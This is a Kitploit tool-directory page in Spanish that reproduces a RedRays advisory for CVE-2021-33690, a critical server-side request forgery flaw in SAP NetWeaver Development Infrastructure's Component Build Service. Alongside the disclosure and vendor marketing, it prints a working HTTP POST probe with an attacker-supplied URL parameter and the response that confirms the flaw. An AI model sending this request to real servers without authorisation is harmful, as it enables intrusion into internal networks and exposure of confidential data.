Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2021-33690 — [CVE-2021-33690] Vulnerabilidad de falsificación de petición del lado del servidor en SAP NetWeaver Development Infrastructure | Kitploit
Herramientas/GitHubGitHub/redrays-io/cve-2021-33690
ReconocimientoAnálisis de VulnerabilidadesExplotaciónRecopilación de InformaciónSeguridad WebPruebas de Penetración
GitHubredrays-io/cve-2021-33690

CVE-2021-33690

[CVE-2021-33690] Vulnerabilidad de falsificación de petición del lado del servidor en SAP NetWeaver Development Infrastructure

Ver Repositorio
1hace 3 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
Sitio web

CVE-2021-33690

[CVE-2021-33690] Vulnerabilidad de Server Side Request Forgery en SAP NetWeaver Development Infrastructure

root@kitploit:~
Application: SAP NetWeaver AS Java
Versions Affected: SAP NetWeaver Development Infrastructure Component Build Service versions – 7.11, 7.20, 7.30, 7.31, 7.40, 7.50
Vendor URL: https://sap.com/
Bug: SSRF
Date of Public Advisory: June 1, 2023
Reference: [https://nvd.nist.gov/vuln/detail/CVE-2021-33690]
SAP Note: 3072955 
SAP Approved Fixes: True
Status: analyzed and published

INFORMACIÓN DEL AVISO
Título: [CVE-2021-33690] Vulnerabilidad de Server-Side Request Forgery en SAP NetWeaver Development Infrastructure
Riesgo: Crítico
URL del aviso: https://redrays.io/cve-2021-33690-server-side-request-forgery-vulnerability/
Fecha de publicación: June 1, 2023

INFORMACIÓN DE LA VULNERABILIDAD
Explotable remotamente: Sí
Explotable localmente: No

Información CVSS
Puntuación base CVSS v3.1: 9.9 / 10 (AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H)

DESCRIPCIÓN DE LA VULNERABILIDAD
Se ha identificado una vulnerabilidad conocida como Server-Side Request Forgery (SSRF) en varias versiones del 
Servicio de compilación de componentes de SAP NetWeaver Development Infrastructure, concretamente 7.11, 7.20, 7.30, 7.31, 7.40 y 7.50.
Esta debilidad dentro del Servicio de compilación de componentes de SAP NetWeaver Development Infrastructure permite a un atacante,
que tenga acceso al servidor, ejecutar ataques de proxy mediante consultas especialmente diseñadas. 
Las consecuencias de dichos ataques pueden llevar al compromiso total de datos confidenciales del servidor, afectando su accesibilidad. 
Es crucial señalar que la gravedad de esta vulnerabilidad depende de si SAP NetWeaver 
Development Infrastructure (NWDI) opera en la intranet o en Internet. La puntuación CVSS se ha calculado basándose 
en el peor escenario, que supone que opera en línea.

DESCRIPCIÓN TÉCNICA

Para determinar si el servidor es vulnerable a SSRF, envíe la siguiente solicitud:

POST /tc.CBS.Appl/tcspseudo HTTP/1.1
Host: redrayssap:50000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Accept: text/html,application/xhtml xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Content-Type: application/x-www-form-urlencoded

CBS=http://%YOUR_PAYLOAD%&USER=1&PWD=1&REQ_CONFIRM_DELAY=2000&ACTION=CONFIGURE

Si se recibe la siguiente respuesta, implica la presencia de la vulnerabilidad:

<?xml version="1.0" encoding="UTF-8"?><Cause>Could not connect to the CBS.</Cause>


Acerca de RedRays
RedRays es una empresa de ciberseguridad de primer nivel que protege los sistemas ERP contra actividades fraudulentas 
internas y amenazas cibernéticas externas. Nos enorgullecemos de ofrecer soluciones de seguridad sólidas para grandes 
corporaciones y proveedores de servicios gestionados que dependen de sistemas ERP importantes como SAP, Oracle y Microsoft. 
Utilizando herramientas y estrategias avanzadas, supervisamos y controlamos proactivamente la seguridad en entornos SAP 
extensos a nivel mundial.

Nuestro objetivo principal es cerrar la brecha de seguridad desde una perspectiva técnica y empresarial, garantizando las 
operaciones fluidas de nuestros clientes y protegiendo sus valiosos datos. En RedRays, estamos comprometidos a mantener 
los más altos estándares de seguridad mientras brindamos un servicio y asistencia extraordinarios al cliente.

Acerca de I+D de RedRays
La piedra angular de los logros de RedRays reside en nuestra unidad de investigación y desarrollo (I+D), especializada en 
estudiar y analizar vulnerabilidades en aplicaciones corporativas esenciales. Nuestras iniciativas de I+D han obtenido 
reconocimiento y admiración de las principales empresas de software como SAP, Oracle, Microsoft Dynamics e IBM.
Esta dedicación a la investigación nos permite anticipar amenazas emergentes y diseñar soluciones de seguridad personalizadas 
que se adaptan a las necesidades de nuestros clientes.

Nuestro equipo está compuesto por profesionales experimentados con diversas habilidades que abarcan varios dominios de seguridad, 
como la evaluación de vulnerabilidades, las pruebas de penetración, la gestión de incidentes y la inteligencia de amenazas. 
Nuestro compromiso es realizar una investigación rigurosa y ofrecer soluciones vanguardistas para fortalecer los sistemas SAP 
contra amenazas en constante cambio.

## Contacto RedRays

Para cualquier pregunta o más detalles, no dude en contactarnos:

* [GitHub](https://github.com/redrays-io)
* [Correo electrónico](mailto:[email protected])
* [Sitio web](https://www.redrays.io?gh)
Descargar herramienta